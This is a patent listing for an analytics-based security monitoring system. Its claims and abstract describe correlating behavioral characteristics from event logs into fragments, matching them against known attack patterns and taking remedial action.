Analytics-based security monitoring system and method
First Claim
1. An analytics-based security monitoring system comprising:
- at least one memory to store instructions; and
a hardware processor communicatively coupled to the at least one memory, the hardware processor, when executing the instructions, to;
receive information collected from at least one computing node in a computing environment,detect a first plurality of behavioral characteristics from behavioral data in the received information, each of the first plurality of behavioral characteristics representing an action conducted in the computing environment,determine one or more behavioral fragments, each of the one or more behavioral fragments comprises a second plurality of behavioral characteristics having a level of relevance to each other that is computed based, at least in part, on one or more of (i) whether the second plurality of behavioral characteristics occur within a prescribed window of time or (ii) whether the second plurality of behavioral characteristics are detected on a single computing node or different computing nodes of the at least one computing node,correlate the one or more determined behavioral fragments against an attack profile comprising a plurality of sets of behavioral fragments where each set of behavioral fragments forms a malicious behavior pattern of a known attack,identify an attack based on the correlated one or more determined behavioral fragments, andperform one or more remedial actions when the attack is identified.
5 Assignments
0 Petitions
Accused Products
Abstract
An analytics-based security monitoring system includes instructions that may be executed by a computing system to receive data in the form of event logs from one or more network devices transferred through a computing environment, detect a plurality of behavioral characteristics from the received event logs, identify behavioral fragments composed of related behavioral characteristics, and identify an attack by correlating the behavioral fragments against patterns of known malicious attacks. The analytics-based security monitoring system may then perform a learning process to enhance further detection of attacks and perform one or more remedial actions when an attack is identified.
284 Citations
25 Claims
-
1. An analytics-based security monitoring system comprising:
-
at least one memory to store instructions; and a hardware processor communicatively coupled to the at least one memory, the hardware processor, when executing the instructions, to; receive information collected from at least one computing node in a computing environment, detect a first plurality of behavioral characteristics from behavioral data in the received information, each of the first plurality of behavioral characteristics representing an action conducted in the computing environment, determine one or more behavioral fragments, each of the one or more behavioral fragments comprises a second plurality of behavioral characteristics having a level of relevance to each other that is computed based, at least in part, on one or more of (i) whether the second plurality of behavioral characteristics occur within a prescribed window of time or (ii) whether the second plurality of behavioral characteristics are detected on a single computing node or different computing nodes of the at least one computing node, correlate the one or more determined behavioral fragments against an attack profile comprising a plurality of sets of behavioral fragments where each set of behavioral fragments forms a malicious behavior pattern of a known attack, identify an attack based on the correlated one or more determined behavioral fragments, and perform one or more remedial actions when the attack is identified. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12)
-
-
13. An analytics-based security monitoring method comprising:
-
receiving, using an operations management application with instructions stored on a non-transitory medium and executed on at least one processor, information collected from at least one computing node in a computing environment; detecting, using the instructions, a plurality of behavioral characteristics from the received information, each of the plurality of behavioral characteristics representing an action conducted in the computing environment; identifying, using the instructions, at least one behavioral fragment comprising one or more of the detected behavioral characteristics that are related by correlating the behavioral characteristics against a correlation profile including information associated with a set of behavioral characteristic that form a behavior pattern, the related behavioral characteristics are determined based, at least in part, on (i) whether the behavioral characteristics occur within a prescribed window of time or (ii) whether the behavioral characteristics are detected on a single computing node or different computing nodes of the at least one computing node; identifying, using the instructions, an attack comprising the at least one behavioral fragment by correlating the at least one behavioral fragment against an attack profile including information associated with a set of behavioral fragments that form an attack pattern; and performing, using the instructions, one or more remedial actions when the attack is identified, the one or more remedial actions including reporting the attack. - View Dependent Claims (14, 15, 16, 17, 18, 19, 20)
-
-
21. A security monitoring system comprising:
-
a security monitoring framework stored in at least one memory and executed on at least one processor of a computing system, the security monitoring framework comprising; a behavioral characteristic detection module that, when executed by the at least one processor, analyzes data in an event log to detect a plurality of behavioral characteristics from the event log data collected from at least one computing node in a computing environment, each of the plurality of behavioral characteristics representing an action conducted in the computing environment; a behavioral fragment determination module that, when executed by the at least one processor, correlates a first of the detected behavioral characteristics against at least one other of the detected behavioral characteristics, and a second of the detected behavioral characteristics against at least one other of the detected behavioral characteristics, using a correlation profile to identify thereby respective first and second behavioral fragments, the correlation profile includes factors including whether the first of the detected behavioral characteristics and the at least one other of the detected behavioral characteristics occur within a prescribed period of time; an attack identification module that, when executed by the at least one processor, identifies an attack by correlating the first and second behavioral fragments against an attack profile including information associated with a plurality of sets of behavioral fragments that each form a malicious behavior pattern of the attack; and a remedial action generation module that, when executed by the at least one processor, performs one or more remedial actions when the attack is identified. - View Dependent Claims (22, 23, 24)
-
-
25. Computer program product code implemented in a non-transitory, computer readable medium that when executed by at least one processor, is operable to perform at least the following:
-
receiving, using an operations management application with instructions stored on a non-transitory medium and executed on at least one processor, information collected from at least one computing node in a computing environment; detecting, using the instructions, a plurality of behavioral characteristics from the received information, each of the plurality of behavioral characteristics representing an action conducted in the computing environment; determining, using the instructions, a behavioral fragment by correlating a first of the detected behavioral characteristics against at least one other detected behavioral characteristic, and a second of the detected behavioral characteristics against at least one other of the detected behavioral characteristics, using a correlation profile to thereby identify respective first and second behavioral fragments, the correlation profile includes factors including whether the first of the detected behavioral characteristics and the at least one other detected behavioral characteristic occur within a prescribed period of time; identifying, using the instructions, an attack by correlating the first and second behavioral fragments against an attack profile including information associated with a plurality of sets of behavioral fragments that each form a malicious behavior pattern of the attack; and performing, using the instructions, one or more remedial actions when the attack is identified.
-
Specification